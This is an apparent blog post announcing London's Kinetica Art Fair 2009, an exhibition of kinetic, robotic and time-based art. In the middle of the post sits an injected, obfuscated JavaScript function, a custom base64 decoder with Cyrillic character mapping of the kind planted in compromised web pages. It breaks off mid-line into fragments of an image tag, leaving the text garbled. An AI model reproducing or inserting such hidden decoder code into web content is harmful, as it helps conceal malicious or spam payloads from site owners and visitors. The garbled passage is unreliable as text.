Image of moth-eating Carnivorous Domestic Entertainment Robot (lamp) by Materials Beliefs.
This sounds like the machine art event of the year, and while plane fares to London are at an all-time low... the Kinetica Art Fair 2009, the UK's first art fair dedicated to kinetic, robotic, sound, light and time-based art, opens in London on Friday, February 27. More than 25 galleries and organizations specializing in kinetic, electronic and new media art are taking part, and *over 150 artists* will exhibit, operate and even be selling their work. The organizer emailed saying, "The Fair will be like no other with 'living' artwork moving, speaking and performing. The Fair provides unparalleled opportunities for the public and collectors alike to view and buy work from this thriving international movement, and to participate in talks, workshops and performances." function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandC_CRW_6315.jpg" src=" art/HandC_CRW_6315.jpg" width="375" height="500" class="mt-image-center" style="text-align: center; display: block; margin: 0 auto 1px;" />